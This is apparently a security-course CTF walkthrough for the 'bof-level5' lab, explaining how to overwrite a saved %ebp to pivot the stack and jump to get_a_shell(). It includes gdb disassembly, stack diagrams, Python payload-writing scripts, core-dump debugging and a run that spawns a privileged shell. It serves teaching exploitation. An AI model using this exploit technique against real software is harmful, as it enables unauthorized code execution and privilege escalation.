# CANDL: unit02/bof-level5

To see exactly where the variables sit on the stack, let's take a look
at the disassembly of `receive_input()`.

```
$ gdb ./bof-level5

Reading symbols from bof-level5...(no debugging symbols found)...done.
pwndbg> disassemble receive_input
Dump of assembler code for function receive_input:
   0x08048558 <+0>:     push   %ebp
   0x08048559 <+1>:     mov    %esp,%ebp
   0x0804855b <+3>:     sub    $0x88,%esp
   0x08048561 <+9>:     sub    $0x4,%esp
   0x08048564 <+12>:    push   $0x84                      <-- 3rd arg, at 0x8(%esp)
   0x08048569 <+17>:    lea    -0x80(%ebp),%eax           <-- buffer address, -0x80(%ebp)
   0x0804856c <+20>:    push   %eax                       <-- 2nd arg, at 0x4(%esp)
   0x0804856d <+21>:    push   $0x0                       <-- 1st arg, at (%esp)
   0x0804856f <+23>:    call   0x8048390 <read@plt>
   0x08048574 <+28>:    add    $0x10,%esp
   0x08048577 <+31>:    nop
   0x08048578 <+32>:    leave
   0x08048579 <+33>:    retl
End of assembler dump.
```

Run `man read` to see the function signature of *read()*:

```
NAME
       read - read from a file descriptor

SYNOPSIS
       #include <unistd.h>

       ssize_t read(int fd, void *buf, size_t count);

-> read(0, %ebp-0x80, 0x84),
```

From the assembly, the buffer is at %ebp-0x80, and read() lets us write up to
132 (0x84) bytes into it. We can draw the stack as follows:

```
[      buffer - %ebp-0x80      ][saved ebp][ret addr]
\__________128 bytes___________/\_4 bytes_/\_4bytes_/
 \_______________132 bytes_______________/
```

We can overwrite the saved %ebp but not the return address.
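
As a quick sanity check on that layout, the reach of the overflow can be computed from the two constants in the disassembly. This is only a small sketch, and the variable names are made up for illustration.

```python
# Constants taken from the disassembly of receive_input().
BUF_OFFSET_FROM_EBP = 0x80   # buffer starts at %ebp-0x80
READ_COUNT = 0x84            # third argument to read()
WORD = 4                     # size of saved %ebp and of the return address (32-bit)

# Number of bytes that land at or above the address held in %ebp.
overflow = READ_COUNT - BUF_OFFSET_FROM_EBP
covers_saved_ebp = overflow >= WORD
covers_ret_addr = overflow >= 2 * WORD

print(overflow, covers_saved_ebp, covers_ret_addr)
```

The overflow is exactly one word long, which is why only the saved %ebp is within reach.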

So here is the plan: we overwrite the saved %ebp, which the `leave-retl` of
`receive_input()` loads into %ebp. Then, when `run()` (the caller of
`receive_input()`) executes its own `leave-retl`, that corrupted %ebp decides
where the return address of `run()` is read from.


Before doing this, let's recap on leave and ret.

```
leave:
  mov %ebp, %esp    <-- set %esp as the same value as %ebp
  pop %ebp          <-- set %ebp as the value of (%esp), and add $4, %esp.

ret:
  pop %eip          <-- set the instruction pointer as the value of (%esp),
                        and add $4, %esp.
```


And, if we execute `leave-retl` twice,

* 1st round
```
leave:
  %esp = %ebp+4
  %ebp = %saved_ebp

ret:
  %eip = (%esp)
```

Now %ebp holds %saved_ebp, and `leave-retl` runs again.

* 2nd round
```
leave:
  %esp = %ebp+4 = %saved_ebp+4
  %ebp = (%ebp) = (%saved_ebp)

ret:
  %eip = (%esp) = (%saved_ebp+4)
```

(Please refer to the slide W2L2 for the animation of the stack operation if you
cannot follow the change of %ebp and %esp)

So, at the 2nd return, the CPU will take the value stored at the address
%saved_ebp+4 as the return address (i.e., it jumps to whatever that memory
location contains, not to %saved_ebp+4 itself).
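
The two rounds can be replayed with a toy model. The sketch below is not how the CPU or gdb works internally: it only models `leave` and `ret` as dictionary operations, ignores the few instructions `run()` executes between the two rounds, and uses made-up addresses (`FRAME`, `FAKE_EBP`) chosen purely for illustration.

```python
def leave(regs, mem):
    # leave = mov %ebp,%esp ; pop %ebp
    regs["esp"] = regs["ebp"]
    regs["ebp"] = mem[regs["esp"]]
    regs["esp"] += 4

def ret(regs, mem):
    # ret = pop %eip
    regs["eip"] = mem[regs["esp"]]
    regs["esp"] += 4

# Hypothetical addresses, not taken from the real program.
FRAME = 0x1000       # %ebp inside receive_input()
FAKE_EBP = 0x2000    # value written over the saved %ebp

mem = {
    FRAME: FAKE_EBP,            # saved %ebp slot (overwritten by us)
    FRAME + 4: 0x080485b5,      # return address into run() (untouched)
    FAKE_EBP: 0x78787878,       # loaded into %ebp by the 2nd leave
    FAKE_EBP + 4: 0x0804850b,   # loaded into %eip by the 2nd ret
}
regs = {"ebp": FRAME, "esp": FRAME - 0x88, "eip": 0}

leave(regs, mem)
ret(regs, mem)                  # 1st round, in receive_input()
first_eip = regs["eip"]

leave(regs, mem)
ret(regs, mem)                  # 2nd round, in run()

print(hex(first_eip), hex(regs["eip"]), hex(regs["ebp"]))
```

The first `ret` still goes back into `run()` as normal; only the second one picks up the word at `FAKE_EBP + 4`.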


Let's do some simple math:

* (%saved_ebp + 4) = return address
* %saved_ebp + 4 = the address that stores the return address
* %saved_ebp = the address that stores the return address - 4

And we can overwrite %saved_ebp.

So, here is what we need to do with this stack:

```
[      buffer - %ebp-0x80      ][saved %ebp][ret_addr in run()]
\__________128 bytes___________/\_4 bytes_/\______4bytes_____/
 \_______________132 bytes_______________/
```

That is, we fill the 128 bytes of the buffer, and then set the last 4 of the 132
bytes to [the address that stores the return address] - 4.

Then, where can we find the address that stores the return address? Let's first
check where we want to return to (the get_a_shell() function).

```
pwndbg$ info functions
...
0x0804850b  get_a_shell
```

Yes, it is at 0x804850b.

Then, would the value be 0x804850b-4 = 0x8048507? NOOOOOOOO. We need to know an
address that *stores* 0x804850b. Is there such a place in the program already?
No, definitely not.

Then, where can we find the address? To find that easily, let's think about the
memory that we can control.

```
[      buffer - %ebp-0x80      ][saved %ebp][ret_addr in run()]
\__________128 bytes___________/\_4 bytes_/\______4bytes_____/
 \_______________132 bytes_______________/
  --- OUR INPUTS (CONTROLLABLE) HERE  ---
```

In the stack, we can control the 132 bytes starting from the buffer. Although we
must put some calculated value for the last 4 bytes (for %saved_ebp), we can
freely set the first 128 bytes of our input.

Then, let's get the address of our buffer. We can easily do this by setting a
breakpoint right before the leave instruction in receive_input, and checking the
buffer's location by inspecting %ebp-0x80.

1. Open gdb and disassemble receive_input
```
  pwndbg$ disas receive_input
  Dump of assembler code for function receive_input:
     0x08048558 <+0>:	push   %ebp
     0x08048559 <+1>:	mov    %esp,%ebp
     0x0804855b <+3>:	sub    $0x88,%esp
     0x08048561 <+9>:	sub    $0x4,%esp
     0x08048564 <+12>:	push   $0x84
     0x08048569 <+17>:	lea    -0x80(%ebp),%eax
     0x0804856c <+20>:	push   %eax
     0x0804856d <+21>:	push   $0x0
     0x0804856f <+23>:	call   0x8048390 <read@plt>
     0x08048574 <+28>:	add    $0x10,%esp
     0x08048577 <+31>:	nop
     0x08048578 <+32>:	leave                          <-- LEAVE at +32
     0x08048579 <+33>:	ret
  End of assembler dump.
  ```

2. Set a breakpoint at receive_input + 32
  ```
  pwndbg$ b *receive_input+32
  Breakpoint 1 at 0x8048578
  ```

3. Run the program
  ```
  pwndbg$ r
  ```


In this tutorial example, I typed '1234' as the content of the buffer.
Let's check where the buffer is:

  ```
  pwndbg$ x/x $ebp-0x80
  0xffffd578:	0x34333231
  ```

Yes, our buffer starts at the address 0xffffd578,
and as we expect, the buffer contains 0x34333231, which is "1234" in little endian.

So if we set the saved %ebp to 0xffffd578, we can make the CPU
use values from our input to manage the stack
(and we will change the return address by doing this!)

Then, what values do we want to set?

First, we need to set saved_ebp to the address of our buffer, 0xffffd578.

```
 /--- pointed to by the saved %ebp, e.g., 0xffffd578
v
[xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
                                  \_____saved_ebp____/
                                  little endian of 0xffffd578.
```

Then, we will fill the buffer as follows:

```
"xxxx" + "\x0b\x85\x04\x08" + "zzzz" * ((128/4)-2)        + "\x78\xd5\xff\xff"
new_ebp   (return_address)     others (to fill 128 bytes)    (start_of_buffer)
\__________________________128 bytes______________________/ \____saved_ebp____/
```
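
The little-endian byte strings above do not have to be written out by hand. As a sketch, Python's `struct.pack` with the `<I` format produces them from the plain addresses. The names `BUF_ADDR`, `GET_A_SHELL`, and `p32` are chosen here for illustration, and the buffer address is the one observed inside gdb.

```python
import struct

BUF_ADDR = 0xffffd578      # buffer address seen in gdb (x/x $ebp-0x80)
GET_A_SHELL = 0x0804850b   # from `info functions`

def p32(value):
    # Pack a 32-bit unsigned integer in little-endian byte order.
    return struct.pack("<I", value)

payload = (
    b"xxxx"                       # popped into %ebp by the 2nd leave
    + p32(GET_A_SHELL)            # popped into %eip by the 2nd ret
    + b"zzzz" * (128 // 4 - 2)    # filler up to 128 bytes
    + p32(BUF_ADDR)               # overwrites the saved %ebp
)

print(p32(GET_A_SHELL), p32(BUF_ADDR), len(payload))
```

Keeping the addresses as integers makes it easier to swap in a different buffer address later without re-deriving the byte order.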


Then at the 2nd return, the CPU will pop its return address from %saved_ebp+4,
which is 0xffffd57c. Our buffer will look like this:

```
/--- pointed to by the saved %ebp, e.g., 0xffffd578
|     /------- 0xffffd57c, contains RET = 0x804850b = get_a_shell()
v    v
[xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
\_4_/\_4_/\_4_/\_4_/\_4_/....\_4_/\________4_________/
\_____________128______________/          /
 \___________________132_________________/
```

RET will be 0x804850b (the address of get_a_shell()), in little endian:
`\x0b\x85\x04\x08`.

Then the CPU will return to get_a_shell by the following steps:

1. Before the first leave at receive_input.

```
/----- pointed by %esp
|                                                /---- pointed by %ebp
v                                                v
[argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
```

2. After the first leave
```
                                                                     /----- pointed by %esp
               /---- pointed by %ebp                                 |
               v                                                     v
[argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
               ^
               |
                \--- address 0xffffd578
```


3. After the return of receive_input() (before the 2nd leave in run())

```
                                                                                        /----- pointed by %esp
               /---- pointed by %ebp                                                    |
               v                                                                        v
[argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
               ^
               |
               \--- address 0xffffd578

```

4. After the 2nd leave in run()

* %ebp now holds "xxxx", the value popped from the start of our buffer.

```
                    /----- pointed by %esp
                    |
                    v
[argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
               ^
               |
               \--- address 0xffffd578
```

5. After the return in run()

* `ret` pops [RET] into %eip, so execution continues at the address of our choice.

```
                         /----- pointed by %esp
                         |
                         v
[argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
               ^
               |
               \--- address 0xffffd578
```


Then the CPU will run get_a_shell() pointed by RET!


To make that input, let's create a Python script.

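```python
#!/usr/bin/env python

# Layout: dummy %ebp value, address of get_a_shell(), filler up to 128 bytes,
# then the buffer address that overwrites the saved %ebp (all little endian).
# Bytes literals and // keep this working on both Python 2.7 and Python 3.
with open('input.txt', 'wb') as f:
    f.write(b"xxxx" + b"\x0b\x85\x04\x08" + b"aaaa" * (128 // 4 - 2) + b"\x78\xd5\xff\xff")
```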


If you run the script, you will get input.txt as:
```
$ xxd input.txt
00000000: 7878 7878 0b85 0408 6161 6161 6161 6161  xxxx....aaaaaaaa
00000010: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000020: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000030: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000040: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000050: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000060: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000070: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000080: 78d5 ffff      x...
```

Let's run that in gdb, with a breakpoint at the first leave.

```
pwndbg$ b *receive_input +32
Note: breakpoint 1 also set at pc 0x8048578.
Breakpoint 2 at 0x8048578
pwndbg$ r < input.txt
```

Step one instruction with 'ni'.

After the first leave, you can observe:
```
EBP: 0xffffd578 --> ("xxxx\v\205\004\b", 'a' <repeats 120 times>, (seems buffer)
ESP: 0xffffd5fc --> 0x80485b5 (<run+59>:	nop)
```


Let's run 'ni' three more times, until the 2nd leave in run() has executed.

Now,

```
EBP: 0x78787878 ('xxxx')
ESP: 0xffffd57c --> 0x804850b (<get_a_shell>:	push   %ebp)
```

ESP points to an address that contains the start address of get_a_shell(),
so if we execute 'ret', it will run get_a_shell()!

Press 'c' to continue!


```
pwndbg$ c
Continuing.
Spawning a privileged shell
process 7252 is executing new program: /bin/bash
Error in re-setting breakpoint 1: No symbol "receive_input" in current context.
Error in re-setting breakpoint 2: No symbol "receive_input" in current context.
Error in re-setting breakpoint 1: No symbol "receive_input" in current context.
Error in re-setting breakpoint 2: No symbol "receive_input" in current context.
Error in re-setting breakpoint 1: No symbol "receive_input" in current context.
Error in re-setting breakpoint 2: No symbol "receive_input" in current context.
[Inferior 1 (process 7252) exited normally]
```

Yes, we can execute the shell...

Then let's try the following command outside gdb (and also press the enter key a few times):
```
$ (cat input.txt; cat) | ./bof-level5
Now we have a buffer overflow vulnerability, but the vulnerability cannot reach
to the return address... Can you exploit this program?

Segmentation fault (core dumped)
```

Uh oh, our exploit does not work.

Why? It's because the environment in gdb differs from the actual environment
when the program runs outside gdb. For example, a different set of environment
variables shifts where the stack contents end up, so the buffer address we saw
in gdb is no longer valid.

We need to account for that difference, and it can easily be observed in the
core file, which is generated when we see that "(core dumped)" message.

A core file contains a snapshot of the memory space of a program at the moment
it crashes. So we can find the exact address in our real environment by
inspecting the core file.

Let's open the core file using 'gdb'.

    $ gdb --core=core
    [New LWP 7261]

    warning: Unexpected size of section `.reg-xstate/7261' in core file.
    Core was generated by `./bof-level5'.
    Program terminated with signal SIGSEGV, Segmentation fault.

    warning: Unexpected size of section `.reg-xstate/7261' in core file.
    #0  0x61616161 in ?? ()


It seems that the program faulted at the address 0x61616161,
and 0x61616161 is "aaaa", which looks like part of our input
(we put "xxxx" + the address of get_a_shell() + a run of "aaaa").

Let's check our stack.

```
pwndbg$ x/100xw $esp
0xffffd580:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd590:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd5a0:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd5b0:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd5c0:	0x61616161	0x61616161	0xffffd578	0x080485b5   <-- 0xffffd578 is the address that we typed
0xffffd5d0:	0x00000001	0xffffd694	0xffffd5e8	0x080485ce
0xffffd5e0:	0xf7fb43dc	0xffffd600	0x00000000	0xf7e1a637
0xffffd5f0:	0xf7fb4000	0xf7fb4000	0x00000000	0xf7e1a637
0xffffd600:	0x00000001	0xffffd694	0xffffd69c	0x00000000
0xffffd610:	0x00000000	0x00000000	0xf7fb4000	0xf7ffdc04
0xffffd620:	0xf7ffd000	0x00000000	0xf7fb4000	0xf7fb4000
0xffffd630:	0x00000000	0xdecab371	0xe22d5d61	0x00000000
0xffffd640:	0x00000000	0x00000000	0x00000001	0x08048410
0xffffd650:	0x00000000	0xf7fee010	0xf7fe8880	0xf7ffd000
0xffffd660:	0x00000001	0x08048410	0x00000000	0x08048431
0xffffd670:	0x080485b8	0x00000001	0xffffd694	0x080485e0
0xffffd680:	0x08048640	0xf7fe8880	0xffffd68c	0xf7ffd918
0xffffd690:	0x00000001	0xffffd7c8	0x00000000	0xffffd7d5
0xffffd6a0:	0xffffd7e5	0xffffd7f0	0xffffd7fb	0xffffd80e
0xffffd6b0:	0xffffd81b	0xffffdda3	0xffffddb6	0xffffddc4
0xffffd6c0:	0xffffddd2	0xffffdde9	0xffffde5f	0xffffde88
0xffffd6d0:	0xffffde99	0xffffdf06	0xffffdf0e	0xffffdf2b
0xffffd6e0:	0xffffdf44	0xffffdf54	0xffffdf74	0xffffdf82
0xffffd6f0:	0xffffdf99	0xffffdfbb	0xffffdfca	0x00000000
0xffffd700:	0x00000020	0xf7fd7fe0	0x00000021	0xf7fd7000
```


Right now, our focus is to find the start address of the buffer.
Because we cannot see the starting point ("xxxx", which is 0x78787878) in this dump,
let's start printing from a lower address, say $esp-0x100.


```
pwndbg$ x/100xw $esp-0x100
0xffffd480:	0xffffd540	0xf7fe2b4b	0x0804820c	0xffffd4f8
0xffffd490:	0xf7ffda74	0x00000001	0xf7fd34a0	0x00000001
0xffffd4a0:	0xf7fe2a70	0x080481dc	0x00000001	0xf7ffd918
0xffffd4b0:	0x0804a00c	0xf7fe78a2	0xf7ffdad0	0xf7fd34a0
0xffffd4c0:	0x00000001	0x00000001	0x00000000	0xf7e6b0b1
0xffffd4d0:	0x00000001	0x0804b008	0x0000001e	0x08048295
0xffffd4e0:	0xf7ffd000	0x0804826c	0xf7e0edc8	0xf7fb4d60
0xffffd4f0:	0x0000000a	0xf7e09b08	0xffffd5b8	0xf7e6a3e4
0xffffd500:	0xf7fe77eb	0x00000000	0xf7fb4000	0xf7fb4000
0xffffd510:	0xffffd5c8	0xf7fee010	0xffffd5c8	0x00000084
0xffffd520:	0xffffd548	0xf7ed7b23	0x00000000	0x08048574
0xffffd530:	0x00000000	0xffffd548	0x00000084	0xf7e6c47b
0xffffd540:	0xf7fb4d60	0x0804b008	0x78787878	0x0804850b   <-- here is our buffer! 0x78787878!!!
0xffffd550:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd560:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd570:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd580:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd590:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd5a0:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd5b0:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd5c0:	0x61616161	0x61616161	0xffffd578	0x080485b5
0xffffd5d0:	0x00000001	0xffffd694	0xffffd5e8	0x080485ce
0xffffd5e0:	0xf7fb43dc	0xffffd600	0x00000000	0xf7e1a637
0xffffd5f0:	0xf7fb4000	0xf7fb4000	0x00000000	0xf7e1a637
0xffffd600:	0x00000001	0xffffd694	0xffffd69c	0x00000000
```


See the line below:
```
0xffffd540:	0xf7fb4d60	0x0804b008	0x78787878	0x0804850b   <-- here is our buffer! 0x78787878!!!
```

Our buffer (which starts with 0x78787878) begins in the middle of the line.
Two 4-byte words precede it on that line, so its address is
0xffffd540 + 8 = 0xffffd548.
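
The same address arithmetic can be done mechanically. The helper below is a hypothetical convenience function (not part of gdb or pwndbg) that takes one line of `x/xw` output and returns the address of the first word matching a given value, assuming every word on the line is 4 bytes wide.

```python
# One line copied from the x/100xw dump above.
line = "0xffffd540:\t0xf7fb4d60\t0x0804b008\t0x78787878\t0x0804850b"

def address_of_word(dump_line, wanted):
    # Return the address of the first 32-bit word equal to `wanted`, or None.
    base_text, rest = dump_line.split(":", 1)
    base = int(base_text, 16)
    for index, word in enumerate(rest.split()):
        if int(word, 16) == wanted:
            return base + 4 * index
    return None

buf_addr = address_of_word(line, 0x78787878)
print(hex(buf_addr))
```

Searching for the marker value "xxxx" (0x78787878) is what makes the start of the buffer easy to spot, which is one reason to begin the payload with a recognizable pattern.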

Let's adjust our address in the script then.

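```python
#!/usr/bin/env python

# Same layout as before; only the last 4 bytes change, to the buffer address
# recovered from the core file (0xffffd548, little endian).
# Bytes literals and // keep this working on both Python 2.7 and Python 3.
with open('input.txt', 'wb') as f:
    f.write(b"xxxx" + b"\x0b\x85\x04\x08" + b"aaaa" * (128 // 4 - 2) + b"\x48\xd5\xff\xff")
```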


Running this script and printing input.txt gives:
```
red9057@blue9057-vm-ctf1 : ~/unit2/bof-level5
$ xxd input.txt
00000000: 7878 7878 0b85 0408 6161 6161 6161 6161  xxxx....aaaaaaaa
00000010: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000020: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000030: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000040: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000050: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000060: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000070: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000080: 48d5 ffff
```

Yes, now the saved %ebp points to 0xffffd548.
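
With both addresses known, it is possible to double-check why the first attempt crashed at 0x61616161 rather than somewhere random. The sketch below assumes the two buffer addresses observed in this walkthrough (they will differ on another machine) and rebuilds the first payload to see which word the 2nd `ret` actually popped.

```python
GDB_BUF = 0xffffd578    # buffer address observed inside gdb
REAL_BUF = 0xffffd548   # buffer address recovered from the core file

# The first payload, whose last 4 bytes still hold the gdb address.
payload = b"xxxx" + b"\x0b\x85\x04\x08" + b"aaaa" * 30 + b"\x78\xd5\xff\xff"

# How far the stack moved between the two environments.
shift = GDB_BUF - REAL_BUF

# With the stale saved %ebp, the 2nd ret pops the word at GDB_BUF + 4,
# which lies this many bytes into the real buffer.
offset = (GDB_BUF + 4) - REAL_BUF
popped = int.from_bytes(payload[offset:offset + 4], "little")

print(hex(shift), offset, hex(popped))
```

The stale address points 0x30 bytes past the real start of the buffer, so the return address was read from the "aaaa" filler, which matches the faulting address reported in the core file.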

And you can get the flag by running the following commands:

```
red9057@blue9057-vm-ctf1 : ~/unit2/bof-level5
$ (cat input.txt;cat) | ./bof-level5
Now we have a buffer overflow vulnerability,
but the vulnerability cannot reach to the return address...
Can you exploit this program?
Spawning a privileged shell
$ id
uid=1006(red9057) gid=50205(unit2-level5-ok) groups=50205(unit2-level5-ok),1006(red9057)
$ cat flag
candl{???SCRAMBLED???}
```